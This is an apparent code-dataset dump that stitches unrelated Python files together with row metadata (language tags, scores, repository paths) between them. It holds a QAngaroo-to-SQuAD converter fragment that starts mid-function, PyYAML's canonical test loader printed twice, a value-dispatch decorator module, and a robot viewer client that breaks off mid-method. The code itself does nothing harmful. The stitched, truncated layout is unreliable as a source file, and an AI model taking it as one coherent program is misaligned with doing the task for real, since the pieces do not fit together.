with open(path, 'r') as f:
return json.load(f)
def convert2SQUAD_format(hoppy_data, write_file_name):
"""
Converts QAngaroo data (hoppy_data) into SQuAD format.
The SQuAD-formatted data is written to disk at write_file_name.
Note: All given support documents per example are concatenated
into one super-document. All text is lowercased.
"""
# adapt the JSON tree structure used in SQUAD.
squad_formatted_content = dict()
squad_formatted_content['version'] = 'hoppy_squad_format'
data = []
# loop over dataset
for datum in hoppy_data:
# Format is deeply nested JSON -- prepare data structures
data_ELEMENT = dict()
data_ELEMENT['title'] = 'dummyTitle'
paragraphs = []
paragraphs_ELEMENT = dict()
qas = []
qas_ELEMENT = dict()
qas_ELEMENT_ANSWERS = []
ANSWERS_ELEMENT = dict()
### content start
qas_ELEMENT['id'] = datum['id']
qas_ELEMENT['question'] = datum['query']
# concatenate all support documents into one superdocument
superdocument = " <new_doc> ".join(datum['supports']).lower()
# where is the answer in the superdocument?
answer_position = superdocument.find(datum['answer'].lower())
if answer_position == -1:
continue
ANSWERS_ELEMENT['answer_start'] = answer_position
ANSWERS_ELEMENT['text'] = datum['answer'].lower()
### content end
# recursively fill in content into the nested SQuAD data format
paragraphs_ELEMENT['context'] = superdocument
qas_ELEMENT_ANSWERS.append(ANSWERS_ELEMENT)
qas_ELEMENT['answers'] = qas_ELEMENT_ANSWERS
qas.append(qas_ELEMENT)
paragraphs_ELEMENT['qas'] = qas
paragraphs.append(paragraphs_ELEMENT)
data_ELEMENT['paragraphs'] = paragraphs
data.append(data_ELEMENT)
squad_formatted_content['data'] = data
with open(write_file_name, 'w') as f:
json.dump(squad_formatted_content, f, indent=1)
print('Done writing SQuAD-formatted data to: ',write_file_name)
def main():
input_path = sys.argv[1]
output_path = sys.argv[2]
convert2SQUAD_format(load_json(input_path), output_path)
if __name__ == "__main__":
main()
|
en
| 0.793152
|
Converts QAngaroo data (hoppy_data) into SQuAD format. The SQuAD-formatted data is written to disk at write_file_name. Note: All given support documents per example are concatenated into one super-document. All text is lowercased. # adapt the JSON tree structure used in SQUAD. # loop over dataset # Format is deeply nested JSON -- prepare data structures ### content start # concatenate all support documents into one superdocument # where is the answer in the superdocument? ### content end # recursively fill in content into the nested SQuAD data format
| 3.121277
| 3
|
desktop/core/ext-py/PyYAML-3.09/tests/lib3/canonical.py
|
t3hi3x/hue
| 19
|
6628500
|
<filename>desktop/core/ext-py/PyYAML-3.09/tests/lib3/canonical.py
import yaml, yaml.composer, yaml.constructor, yaml.resolver
class CanonicalError(yaml.YAMLError):
    """Error raised while scanning or parsing canonical-form YAML."""
    pass
class CanonicalScanner:
    """
    Tokenizer for YAML's canonical form.

    The canonical form uses only flow-style collections, double-quoted
    scalars, explicit '?'/':' keys and values, and '---' document markers,
    so this scanner is far simpler than the full YAML scanner.
    """

    def __init__(self, data):
        # Accept bytes or str; bytes must decode as UTF-8.
        if isinstance(data, bytes):
            try:
                data = data.decode('utf-8')
            except UnicodeDecodeError:
                raise CanonicalError("utf-8 stream is expected")
        # A trailing NUL sentinel lets the scan loops avoid bounds checks.
        self.data = data+'\0'
        self.index = 0
        self.tokens = []
        self.scanned = False

    def check_token(self, *choices):
        # True if a next token exists and (when choices given) matches one of them.
        if not self.scanned:
            self.scan()
        if self.tokens:
            if not choices:
                return True
            for choice in choices:
                if isinstance(self.tokens[0], choice):
                    return True
        return False

    def peek_token(self):
        # Return the next token without consuming it (None at end of stream).
        if not self.scanned:
            self.scan()
        if self.tokens:
            return self.tokens[0]

    def get_token(self, choice=None):
        # Consume and return the next token; optionally enforce its type.
        if not self.scanned:
            self.scan()
        token = self.tokens.pop(0)
        if choice and not isinstance(token, choice):
            raise CanonicalError("unexpected token "+repr(token))
        return token

    def get_token_value(self):
        # Consume the next token and return just its value attribute.
        token = self.get_token()
        return token.value

    def scan(self):
        # Tokenize the entire input eagerly into self.tokens, dispatching
        # on the first character of each token.
        self.tokens.append(yaml.StreamStartToken(None, None))
        while True:
            self.find_token()
            ch = self.data[self.index]
            if ch == '\0':
                self.tokens.append(yaml.StreamEndToken(None, None))
                break
            elif ch == '%':
                self.tokens.append(self.scan_directive())
            elif ch == '-' and self.data[self.index:self.index+3] == '---':
                self.index += 3
                self.tokens.append(yaml.DocumentStartToken(None, None))
            elif ch == '[':
                self.index += 1
                self.tokens.append(yaml.FlowSequenceStartToken(None, None))
            elif ch == '{':
                self.index += 1
                self.tokens.append(yaml.FlowMappingStartToken(None, None))
            elif ch == ']':
                self.index += 1
                self.tokens.append(yaml.FlowSequenceEndToken(None, None))
            elif ch == '}':
                self.index += 1
                self.tokens.append(yaml.FlowMappingEndToken(None, None))
            elif ch == '?':
                self.index += 1
                self.tokens.append(yaml.KeyToken(None, None))
            elif ch == ':':
                self.index += 1
                self.tokens.append(yaml.ValueToken(None, None))
            elif ch == ',':
                self.index += 1
                self.tokens.append(yaml.FlowEntryToken(None, None))
            elif ch == '*' or ch == '&':
                self.tokens.append(self.scan_alias())
            elif ch == '!':
                self.tokens.append(self.scan_tag())
            elif ch == '"':
                self.tokens.append(self.scan_scalar())
            else:
                raise CanonicalError("invalid token")
        self.scanned = True

    # The only directive the canonical form accepts.
    DIRECTIVE = '%YAML 1.1'

    def scan_directive(self):
        # Match the literal '%YAML 1.1' directive followed by a separator.
        if self.data[self.index:self.index+len(self.DIRECTIVE)] == self.DIRECTIVE and \
                self.data[self.index+len(self.DIRECTIVE)] in ' \n\0':
            self.index += len(self.DIRECTIVE)
            return yaml.DirectiveToken('YAML', (1, 1), None, None)
        else:
            raise CanonicalError("invalid directive")

    def scan_alias(self):
        # '*name' is an alias reference, '&name' an anchor definition.
        if self.data[self.index] == '*':
            TokenClass = yaml.AliasToken
        else:
            TokenClass = yaml.AnchorToken
        self.index += 1
        start = self.index
        while self.data[self.index] not in ', \n\0':
            self.index += 1
        value = self.data[start:self.index]
        return TokenClass(value, None, None)

    def scan_tag(self):
        # Scan '!...' and expand shorthand forms to a full tag value.
        self.index += 1
        start = self.index
        while self.data[self.index] not in ' \n\0':
            self.index += 1
        value = self.data[start:self.index]
        if not value:
            value = '!'
        elif value[0] == '!':
            # '!!suffix' -> standard YAML tag namespace.
            value = 'tag:yaml.org,2002:'+value[1:]
        elif value[0] == '<' and value[-1] == '>':
            # '!<verbatim>' -> strip the angle brackets.
            value = value[1:-1]
        else:
            value = '!'+value
        return yaml.TagToken(value, None, None)

    # Hex-digit counts for '\x', '\u', '\U' numeric escapes.
    QUOTE_CODES = {
        'x': 2,
        'u': 4,
        'U': 8,
    }

    # Single-character escape replacements inside double-quoted scalars.
    QUOTE_REPLACES = {
        '\\': '\\',
        '\"': '\"',
        ' ': ' ',
        'a': '\x07',
        'b': '\x08',
        'e': '\x1B',
        'f': '\x0C',
        'n': '\x0A',
        'r': '\x0D',
        't': '\x09',
        'v': '\x0B',
        'N': '\u0085',
        'L': '\u2028',
        'P': '\u2029',
        '_': '_',
        '0': '\x00',
    }

    def scan_scalar(self):
        # Scan a double-quoted scalar, handling escapes and folded newlines.
        self.index += 1
        chunks = []
        start = self.index
        # When True, spaces following a folded line break are skipped.
        ignore_spaces = False
        while self.data[self.index] != '"':
            if self.data[self.index] == '\\':
                ignore_spaces = False
                chunks.append(self.data[start:self.index])
                self.index += 1
                ch = self.data[self.index]
                self.index += 1
                if ch == '\n':
                    # Escaped newline: pure line continuation, emits nothing.
                    ignore_spaces = True
                elif ch in self.QUOTE_CODES:
                    # Numeric escape: read the fixed number of hex digits.
                    length = self.QUOTE_CODES[ch]
                    code = int(self.data[self.index:self.index+length], 16)
                    chunks.append(chr(code))
                    self.index += length
                else:
                    if ch not in self.QUOTE_REPLACES:
                        raise CanonicalError("invalid escape code")
                    chunks.append(self.QUOTE_REPLACES[ch])
                start = self.index
            elif self.data[self.index] == '\n':
                # Unescaped newline folds into a single space.
                chunks.append(self.data[start:self.index])
                chunks.append(' ')
                self.index += 1
                start = self.index
                ignore_spaces = True
            elif ignore_spaces and self.data[self.index] == ' ':
                self.index += 1
                start = self.index
            else:
                ignore_spaces = False
                self.index += 1
        chunks.append(self.data[start:self.index])
        self.index += 1
        return yaml.ScalarToken(''.join(chunks), False, None, None)

    def find_token(self):
        # Skip spaces, tabs, '#' comments and line breaks up to the next token.
        found = False
        while not found:
            while self.data[self.index] in ' \t':
                self.index += 1
            if self.data[self.index] == '#':
                while self.data[self.index] != '\n':
                    self.index += 1
            if self.data[self.index] == '\n':
                self.index += 1
            else:
                found = True
class CanonicalParser:
    """Recursive-descent parser over the token stream of CanonicalScanner.

    Each ``parse_*`` method consumes tokens (via the scanner mixin's
    ``get_token``/``check_token``) and appends the corresponding PyYAML
    events to ``self.events``.  The grammar handled by each method is given
    in the comment above it.
    """
    def __init__(self):
        self.events = []
        self.parsed = False
    # stream: STREAM-START document* STREAM-END
    def parse_stream(self):
        self.get_token(yaml.StreamStartToken)
        self.events.append(yaml.StreamStartEvent(None, None))
        while not self.check_token(yaml.StreamEndToken):
            if self.check_token(yaml.DirectiveToken, yaml.DocumentStartToken):
                self.parse_document()
            else:
                raise CanonicalError("document is expected, got "+repr(self.tokens[0]))
        self.get_token(yaml.StreamEndToken)
        self.events.append(yaml.StreamEndEvent(None, None))
    # document: DIRECTIVE? DOCUMENT-START node
    def parse_document(self):
        # (The previous version bound an unused local ``node = None`` here;
        # removed, since the parsed node is emitted as events, not returned.)
        if self.check_token(yaml.DirectiveToken):
            self.get_token(yaml.DirectiveToken)
        self.get_token(yaml.DocumentStartToken)
        self.events.append(yaml.DocumentStartEvent(None, None))
        self.parse_node()
        self.events.append(yaml.DocumentEndEvent(None, None))
    # node: ALIAS | ANCHOR? TAG? (SCALAR|sequence|mapping)
    def parse_node(self):
        if self.check_token(yaml.AliasToken):
            self.events.append(yaml.AliasEvent(self.get_token_value(), None, None))
        else:
            anchor = None
            if self.check_token(yaml.AnchorToken):
                anchor = self.get_token_value()
            tag = None
            if self.check_token(yaml.TagToken):
                tag = self.get_token_value()
            if self.check_token(yaml.ScalarToken):
                self.events.append(yaml.ScalarEvent(anchor, tag, (False, False), self.get_token_value(), None, None))
            elif self.check_token(yaml.FlowSequenceStartToken):
                self.events.append(yaml.SequenceStartEvent(anchor, tag, None, None))
                self.parse_sequence()
            elif self.check_token(yaml.FlowMappingStartToken):
                self.events.append(yaml.MappingStartEvent(anchor, tag, None, None))
                self.parse_mapping()
            else:
                raise CanonicalError("SCALAR, '[', or '{' is expected, got "+repr(self.tokens[0]))
    # sequence: SEQUENCE-START (node (ENTRY node)*)? ENTRY? SEQUENCE-END
    def parse_sequence(self):
        self.get_token(yaml.FlowSequenceStartToken)
        if not self.check_token(yaml.FlowSequenceEndToken):
            self.parse_node()
            while not self.check_token(yaml.FlowSequenceEndToken):
                self.get_token(yaml.FlowEntryToken)
                if not self.check_token(yaml.FlowSequenceEndToken):
                    self.parse_node()
        self.get_token(yaml.FlowSequenceEndToken)
        self.events.append(yaml.SequenceEndEvent(None, None))
    # mapping: MAPPING-START (map_entry (ENTRY map_entry)*)? ENTRY? MAPPING-END
    def parse_mapping(self):
        self.get_token(yaml.FlowMappingStartToken)
        if not self.check_token(yaml.FlowMappingEndToken):
            self.parse_map_entry()
            while not self.check_token(yaml.FlowMappingEndToken):
                self.get_token(yaml.FlowEntryToken)
                if not self.check_token(yaml.FlowMappingEndToken):
                    self.parse_map_entry()
        self.get_token(yaml.FlowMappingEndToken)
        self.events.append(yaml.MappingEndEvent(None, None))
    # map_entry: KEY node VALUE node
    def parse_map_entry(self):
        self.get_token(yaml.KeyToken)
        self.parse_node()
        self.get_token(yaml.ValueToken)
        self.parse_node()
    def parse(self):
        # Parse the whole stream eagerly; events are then served from the list.
        self.parse_stream()
        self.parsed = True
    def get_event(self):
        if not self.parsed:
            self.parse()
        return self.events.pop(0)
    def check_event(self, *choices):
        # True if an event is pending and (when choices given) matches one.
        if not self.parsed:
            self.parse()
        if self.events:
            if not choices:
                return True
            for choice in choices:
                if isinstance(self.events[0], choice):
                    return True
        return False
    def peek_event(self):
        if not self.parsed:
            self.parse()
        return self.events[0]
class CanonicalLoader(CanonicalScanner, CanonicalParser,
        yaml.composer.Composer, yaml.constructor.Constructor, yaml.resolver.Resolver):
    # A PyYAML Loader that swaps in the canonical-form scanner and parser
    # while reusing PyYAML's composer, constructor and resolver stages.
    def __init__(self, stream):
        # Accept either a file-like object or a string/bytes buffer.
        if hasattr(stream, 'read'):
            stream = stream.read()
        CanonicalScanner.__init__(self, stream)
        CanonicalParser.__init__(self)
        yaml.composer.Composer.__init__(self)
        yaml.constructor.Constructor.__init__(self)
        yaml.resolver.Resolver.__init__(self)
yaml.CanonicalLoader = CanonicalLoader
# Convenience wrappers mirroring the top-level yaml.* entry points with
# Loader pre-bound to CanonicalLoader; each is also attached onto the yaml
# package so callers can use e.g. yaml.canonical_load(...).
def canonical_scan(stream):
    return yaml.scan(stream, Loader=CanonicalLoader)
yaml.canonical_scan = canonical_scan
def canonical_parse(stream):
    return yaml.parse(stream, Loader=CanonicalLoader)
yaml.canonical_parse = canonical_parse
def canonical_compose(stream):
    return yaml.compose(stream, Loader=CanonicalLoader)
yaml.canonical_compose = canonical_compose
def canonical_compose_all(stream):
    return yaml.compose_all(stream, Loader=CanonicalLoader)
yaml.canonical_compose_all = canonical_compose_all
def canonical_load(stream):
    return yaml.load(stream, Loader=CanonicalLoader)
yaml.canonical_load = canonical_load
def canonical_load_all(stream):
    return yaml.load_all(stream, Loader=CanonicalLoader)
yaml.canonical_load_all = canonical_load_all
|
<filename>desktop/core/ext-py/PyYAML-3.09/tests/lib3/canonical.py
import yaml, yaml.composer, yaml.constructor, yaml.resolver
class CanonicalError(yaml.YAMLError):
pass
class CanonicalScanner:
def __init__(self, data):
if isinstance(data, bytes):
try:
data = data.decode('utf-8')
except UnicodeDecodeError:
raise CanonicalError("utf-8 stream is expected")
self.data = data+'\0'
self.index = 0
self.tokens = []
self.scanned = False
def check_token(self, *choices):
if not self.scanned:
self.scan()
if self.tokens:
if not choices:
return True
for choice in choices:
if isinstance(self.tokens[0], choice):
return True
return False
def peek_token(self):
if not self.scanned:
self.scan()
if self.tokens:
return self.tokens[0]
def get_token(self, choice=None):
if not self.scanned:
self.scan()
token = self.tokens.pop(0)
if choice and not isinstance(token, choice):
raise CanonicalError("unexpected token "+repr(token))
return token
def get_token_value(self):
token = self.get_token()
return token.value
def scan(self):
self.tokens.append(yaml.StreamStartToken(None, None))
while True:
self.find_token()
ch = self.data[self.index]
if ch == '\0':
self.tokens.append(yaml.StreamEndToken(None, None))
break
elif ch == '%':
self.tokens.append(self.scan_directive())
elif ch == '-' and self.data[self.index:self.index+3] == '---':
self.index += 3
self.tokens.append(yaml.DocumentStartToken(None, None))
elif ch == '[':
self.index += 1
self.tokens.append(yaml.FlowSequenceStartToken(None, None))
elif ch == '{':
self.index += 1
self.tokens.append(yaml.FlowMappingStartToken(None, None))
elif ch == ']':
self.index += 1
self.tokens.append(yaml.FlowSequenceEndToken(None, None))
elif ch == '}':
self.index += 1
self.tokens.append(yaml.FlowMappingEndToken(None, None))
elif ch == '?':
self.index += 1
self.tokens.append(yaml.KeyToken(None, None))
elif ch == ':':
self.index += 1
self.tokens.append(yaml.ValueToken(None, None))
elif ch == ',':
self.index += 1
self.tokens.append(yaml.FlowEntryToken(None, None))
elif ch == '*' or ch == '&':
self.tokens.append(self.scan_alias())
elif ch == '!':
self.tokens.append(self.scan_tag())
elif ch == '"':
self.tokens.append(self.scan_scalar())
else:
raise CanonicalError("invalid token")
self.scanned = True
DIRECTIVE = '%YAML 1.1'
def scan_directive(self):
if self.data[self.index:self.index+len(self.DIRECTIVE)] == self.DIRECTIVE and \
self.data[self.index+len(self.DIRECTIVE)] in ' \n\0':
self.index += len(self.DIRECTIVE)
return yaml.DirectiveToken('YAML', (1, 1), None, None)
else:
raise CanonicalError("invalid directive")
def scan_alias(self):
if self.data[self.index] == '*':
TokenClass = yaml.AliasToken
else:
TokenClass = yaml.AnchorToken
self.index += 1
start = self.index
while self.data[self.index] not in ', \n\0':
self.index += 1
value = self.data[start:self.index]
return TokenClass(value, None, None)
def scan_tag(self):
self.index += 1
start = self.index
while self.data[self.index] not in ' \n\0':
self.index += 1
value = self.data[start:self.index]
if not value:
value = '!'
elif value[0] == '!':
value = 'tag:yaml.org,2002:'+value[1:]
elif value[0] == '<' and value[-1] == '>':
value = value[1:-1]
else:
value = '!'+value
return yaml.TagToken(value, None, None)
QUOTE_CODES = {
'x': 2,
'u': 4,
'U': 8,
}
QUOTE_REPLACES = {
'\\': '\\',
'\"': '\"',
' ': ' ',
'a': '\x07',
'b': '\x08',
'e': '\x1B',
'f': '\x0C',
'n': '\x0A',
'r': '\x0D',
't': '\x09',
'v': '\x0B',
'N': '\u0085',
'L': '\u2028',
'P': '\u2029',
'_': '_',
'0': '\x00',
}
def scan_scalar(self):
self.index += 1
chunks = []
start = self.index
ignore_spaces = False
while self.data[self.index] != '"':
if self.data[self.index] == '\\':
ignore_spaces = False
chunks.append(self.data[start:self.index])
self.index += 1
ch = self.data[self.index]
self.index += 1
if ch == '\n':
ignore_spaces = True
elif ch in self.QUOTE_CODES:
length = self.QUOTE_CODES[ch]
code = int(self.data[self.index:self.index+length], 16)
chunks.append(chr(code))
self.index += length
else:
if ch not in self.QUOTE_REPLACES:
raise CanonicalError("invalid escape code")
chunks.append(self.QUOTE_REPLACES[ch])
start = self.index
elif self.data[self.index] == '\n':
chunks.append(self.data[start:self.index])
chunks.append(' ')
self.index += 1
start = self.index
ignore_spaces = True
elif ignore_spaces and self.data[self.index] == ' ':
self.index += 1
start = self.index
else:
ignore_spaces = False
self.index += 1
chunks.append(self.data[start:self.index])
self.index += 1
return yaml.ScalarToken(''.join(chunks), False, None, None)
def find_token(self):
found = False
while not found:
while self.data[self.index] in ' \t':
self.index += 1
if self.data[self.index] == '#':
while self.data[self.index] != '\n':
self.index += 1
if self.data[self.index] == '\n':
self.index += 1
else:
found = True
class CanonicalParser:
def __init__(self):
self.events = []
self.parsed = False
# stream: STREAM-START document* STREAM-END
def parse_stream(self):
self.get_token(yaml.StreamStartToken)
self.events.append(yaml.StreamStartEvent(None, None))
while not self.check_token(yaml.StreamEndToken):
if self.check_token(yaml.DirectiveToken, yaml.DocumentStartToken):
self.parse_document()
else:
raise CanonicalError("document is expected, got "+repr(self.tokens[0]))
self.get_token(yaml.StreamEndToken)
self.events.append(yaml.StreamEndEvent(None, None))
# document: DIRECTIVE? DOCUMENT-START node
def parse_document(self):
node = None
if self.check_token(yaml.DirectiveToken):
self.get_token(yaml.DirectiveToken)
self.get_token(yaml.DocumentStartToken)
self.events.append(yaml.DocumentStartEvent(None, None))
self.parse_node()
self.events.append(yaml.DocumentEndEvent(None, None))
# node: ALIAS | ANCHOR? TAG? (SCALAR|sequence|mapping)
def parse_node(self):
if self.check_token(yaml.AliasToken):
self.events.append(yaml.AliasEvent(self.get_token_value(), None, None))
else:
anchor = None
if self.check_token(yaml.AnchorToken):
anchor = self.get_token_value()
tag = None
if self.check_token(yaml.TagToken):
tag = self.get_token_value()
if self.check_token(yaml.ScalarToken):
self.events.append(yaml.ScalarEvent(anchor, tag, (False, False), self.get_token_value(), None, None))
elif self.check_token(yaml.FlowSequenceStartToken):
self.events.append(yaml.SequenceStartEvent(anchor, tag, None, None))
self.parse_sequence()
elif self.check_token(yaml.FlowMappingStartToken):
self.events.append(yaml.MappingStartEvent(anchor, tag, None, None))
self.parse_mapping()
else:
raise CanonicalError("SCALAR, '[', or '{' is expected, got "+repr(self.tokens[0]))
# sequence: SEQUENCE-START (node (ENTRY node)*)? ENTRY? SEQUENCE-END
def parse_sequence(self):
self.get_token(yaml.FlowSequenceStartToken)
if not self.check_token(yaml.FlowSequenceEndToken):
self.parse_node()
while not self.check_token(yaml.FlowSequenceEndToken):
self.get_token(yaml.FlowEntryToken)
if not self.check_token(yaml.FlowSequenceEndToken):
self.parse_node()
self.get_token(yaml.FlowSequenceEndToken)
self.events.append(yaml.SequenceEndEvent(None, None))
# mapping: MAPPING-START (map_entry (ENTRY map_entry)*)? ENTRY? MAPPING-END
def parse_mapping(self):
self.get_token(yaml.FlowMappingStartToken)
if not self.check_token(yaml.FlowMappingEndToken):
self.parse_map_entry()
while not self.check_token(yaml.FlowMappingEndToken):
self.get_token(yaml.FlowEntryToken)
if not self.check_token(yaml.FlowMappingEndToken):
self.parse_map_entry()
self.get_token(yaml.FlowMappingEndToken)
self.events.append(yaml.MappingEndEvent(None, None))
# map_entry: KEY node VALUE node
def parse_map_entry(self):
self.get_token(yaml.KeyToken)
self.parse_node()
self.get_token(yaml.ValueToken)
self.parse_node()
def parse(self):
self.parse_stream()
self.parsed = True
def get_event(self):
if not self.parsed:
self.parse()
return self.events.pop(0)
def check_event(self, *choices):
if not self.parsed:
self.parse()
if self.events:
if not choices:
return True
for choice in choices:
if isinstance(self.events[0], choice):
return True
return False
def peek_event(self):
if not self.parsed:
self.parse()
return self.events[0]
class CanonicalLoader(CanonicalScanner, CanonicalParser,
yaml.composer.Composer, yaml.constructor.Constructor, yaml.resolver.Resolver):
def __init__(self, stream):
if hasattr(stream, 'read'):
stream = stream.read()
CanonicalScanner.__init__(self, stream)
CanonicalParser.__init__(self)
yaml.composer.Composer.__init__(self)
yaml.constructor.Constructor.__init__(self)
yaml.resolver.Resolver.__init__(self)
yaml.CanonicalLoader = CanonicalLoader
def canonical_scan(stream):
return yaml.scan(stream, Loader=CanonicalLoader)
yaml.canonical_scan = canonical_scan
def canonical_parse(stream):
return yaml.parse(stream, Loader=CanonicalLoader)
yaml.canonical_parse = canonical_parse
def canonical_compose(stream):
return yaml.compose(stream, Loader=CanonicalLoader)
yaml.canonical_compose = canonical_compose
def canonical_compose_all(stream):
return yaml.compose_all(stream, Loader=CanonicalLoader)
yaml.canonical_compose_all = canonical_compose_all
def canonical_load(stream):
return yaml.load(stream, Loader=CanonicalLoader)
yaml.canonical_load = canonical_load
def canonical_load_all(stream):
return yaml.load_all(stream, Loader=CanonicalLoader)
yaml.canonical_load_all = canonical_load_all
|
en
| 0.519769
|
# stream: STREAM-START document* STREAM-END # document: DIRECTIVE? DOCUMENT-START node # node: ALIAS | ANCHOR? TAG? (SCALAR|sequence|mapping) # sequence: SEQUENCE-START (node (ENTRY node)*)? ENTRY? SEQUENCE-END # mapping: MAPPING-START (map_entry (ENTRY map_entry)*)? ENTRY? MAPPING-END # map_entry: KEY node VALUE node
| 2.251443
| 2
|
valuedispatch.py
|
what-studio/valuedispatch
| 12
|
6628501
|
<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
valuedispatch
~~~~~~~~~~~~~
:mod:`valuedispatch`-like API but dispatches value instead of type.
:copyright: (c) 2015-2016 by What! Studio
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
__version__ = '0.0.1'
__all__ = ['valuedispatch']
# Import or define :class:`MappingProxyType`.
try:
    # Prefer the proxy type shipped with the singledispatch backport helpers.
    from singledispatch_helpers import MappingProxyType
except ImportError:
    # Fall back to a minimal stand-in built on UserDict
    # (``collections`` on Python 3, the top-level module on Python 2).
    try:
        from collections import UserDict
    except ImportError:
        from UserDict import UserDict
    class MappingProxyType(UserDict):
        # Wrap *data* without copying so the proxy always reflects it.
        def __init__(self, data):
            UserDict.__init__(self)
            self.data = data
def valuedispatch(func):
    """Decorate *func* so calls dispatch on the value of the first argument.

    Handlers are attached with ``wrapper.register(value[, handler])``; a call
    whose first argument matches no registered value falls back to *func*.
    """
    handlers = {}

    def dispatch(value):
        # Handler for *value*, defaulting to the undecorated base function.
        return handlers.get(value, func)

    def register(value, func=None):
        # Support both register(v, f) and the @register(v) decorator form.
        if func is None:
            def decorator(f):
                return register(value, f)
            return decorator
        handlers[value] = func
        return func

    def wrapper(*args, **kw):
        return dispatch(args[0])(*args, **kw)

    wrapper.register = register
    wrapper.dispatch = dispatch
    wrapper.registry = MappingProxyType(handlers)
    update_wrapper(wrapper, func)
    return wrapper
|
# -*- coding: utf-8 -*-
"""
valuedispatch
~~~~~~~~~~~~~
:mod:`valuedispatch`-like API but dispatches value instead of type.
:copyright: (c) 2015-2016 by What! Studio
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
__version__ = '0.0.1'
__all__ = ['valuedispatch']
# Import or define :class:`MappingProxyType`.
try:
from singledispatch_helpers import MappingProxyType
except ImportError:
try:
from collections import UserDict
except ImportError:
from UserDict import UserDict
class MappingProxyType(UserDict):
def __init__(self, data):
UserDict.__init__(self)
self.data = data
def valuedispatch(func):
"""Decorates a function to dispatch handler of the value of the first
argument.
"""
registry = {}
def dispatch(value):
return registry.get(value, func)
def register(value, func=None):
if func is None:
return lambda f: register(value, f)
registry[value] = func
return func
def wrapper(*args, **kw):
return dispatch(args[0])(*args, **kw)
wrapper.register = register
wrapper.dispatch = dispatch
wrapper.registry = MappingProxyType(registry)
update_wrapper(wrapper, func)
return wrapper
|
en
| 0.501435
|
# -*- coding: utf-8 -*- valuedispatch ~~~~~~~~~~~~~ :mod:`valuedispatch`-like API but dispatches value instead of type. :copyright: (c) 2015-2016 by What! Studio :license: BSD, see LICENSE for more details. # Import or define :class:`MappingProxyType`. Decorates a function to dispatch handler of the value of the first argument.
| 2.308673
| 2
|
src/python/director/viewerclient.py
|
edrumwri/director
| 0
|
6628502
|
<reponame>edrumwri/director<gh_stars>0
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
    """Hands out process-unique client id strings for viewer connections."""

    def __init__(self):
        self.pid = os.getpid()
        self.counter = 0

    def new_client_id(self):
        """Return the next id of the form ``py_<pid>_<n>``."""
        self.counter += 1
        return "py_%d_%d" % (self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
    # Wrap a JSON-serializable command dict (must carry a "utime" key) in a
    # viewer2_comms_t LCM message using the "treeviewer_json" v1.0 format.
    msg = viewer2_comms_t()
    msg.utime = data["utime"]
    msg.format = "treeviewer_json"
    msg.format_version_major = 1
    msg.format_version_minor = 0
    msg.data = bytearray(json.dumps(data), encoding='utf-8')
    msg.num_bytes = len(msg.data)
    return msg
def serialize_transform(tform):
    # Split a 4x4 homogeneous transform into translation + quaternion lists
    # for the JSON wire format (ordering per the transformations module).
    return {
        "translation": list(transformations.translation_from_matrix(tform)),
        "quaternion": list(transformations.quaternion_from_matrix(tform))
    }
class GeometryData(object):
    """A geometry plus its display color (RGBA) and local 4x4 transform."""
    __slots__ = ["geometry", "color", "transform"]

    def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
        self.geometry = geometry
        self.color = color
        self.transform = transform

    def serialize(self):
        """Serialize the wrapped geometry, attaching color/transform fields."""
        serialized = self.geometry.serialize()
        serialized["color"] = list(self.color)
        serialized["transform"] = serialize_transform(self.transform)
        return serialized
class BaseGeometry(object):
    # Abstract base: concrete geometries implement serialize() -> dict.
    def serialize(self):
        raise NotImplementedError()
class Box(BaseGeometry):
    """Axis-aligned box with edge lengths along x, y, z."""
    __slots__ = ["lengths"]

    def __init__(self, lengths=None):
        # Fix: the previous default ``lengths=[1, 1, 1]`` was a shared mutable
        # default — mutating one default-constructed Box leaked into all.
        self.lengths = [1, 1, 1] if lengths is None else lengths

    def serialize(self):
        """Return the JSON-ready dict describing this box."""
        return {
            "type": "box",
            "lengths": list(self.lengths)
        }
class Sphere(BaseGeometry):
    """Sphere described by its radius."""
    __slots__ = ["radius"]

    def __init__(self, radius=1):
        self.radius = radius

    def serialize(self):
        """Return the JSON-ready dict describing this sphere."""
        return {"type": "sphere", "radius": self.radius}
class Ellipsoid(BaseGeometry):
    """Axis-aligned ellipsoid with semi-axis radii along x, y, z."""
    __slots__ = ["radii"]

    def __init__(self, radii=None):
        # Fix: the previous default ``radii=[1, 1, 1]`` was a shared mutable
        # default — mutating one default-constructed Ellipsoid leaked into all.
        self.radii = [1, 1, 1] if radii is None else radii

    def serialize(self):
        """Return the JSON-ready dict describing this ellipsoid."""
        return {
            "type": "ellipsoid",
            "radii": list(self.radii)
        }
class Cylinder(BaseGeometry):
    """Cylinder described by its length and radius."""
    __slots__ = ["length", "radius"]

    def __init__(self, length=1, radius=1):
        self.length = length
        self.radius = radius

    def serialize(self):
        """Return the JSON-ready dict describing this cylinder."""
        return {"type": "cylinder", "length": self.length, "radius": self.radius}
class Triad(BaseGeometry):
    """Coordinate-frame marker; drawn as tubes when ``tube`` is true."""
    __slots__ = ["tube", "scale"]

    def __init__(self, scale=1.0, tube=False):
        self.scale = scale
        self.tube = tube

    def serialize(self):
        """Return the JSON-ready dict describing this triad."""
        return {"type": "triad", "scale": self.scale, "tube": self.tube}
class PointCloud(BaseGeometry):
    """A set of 3D points with optional named per-point data channels."""
    __slots__ = ["points", "channels"]

    def __init__(self, points, channels=None):
        # Fix: the previous default ``channels={}`` was a shared mutable
        # default — adding a channel to one default-constructed cloud
        # leaked into every other one.
        self.points = points
        self.channels = {} if channels is None else channels

    def serialize(self):
        """Return the JSON-ready dict: nested lists for points and channels."""
        return {
            "type": "pointcloud",
            "points": [list(p) for p in self.points],
            "channels": {name: [list(c) for c in values]
                         for (name, values) in self.channels.items()}
        }
class PolyLine(BaseGeometry):
    """A tube through a sequence of points, optionally closed and with
    arrow heads at either end."""

    def __init__(self, points, radius=0.01, closed=False,
                 start_head=False, end_head=False,
                 head_radius=0.05, head_length=None):
        self.points = points
        self.radius = radius
        self.closed = closed
        self.start_head = start_head
        self.end_head = end_head
        self.head_radius = head_radius
        # An unspecified head length defaults to the head radius.
        if head_length is None:
            self.head_length = head_radius
        else:
            self.head_length = head_length

    def serialize(self):
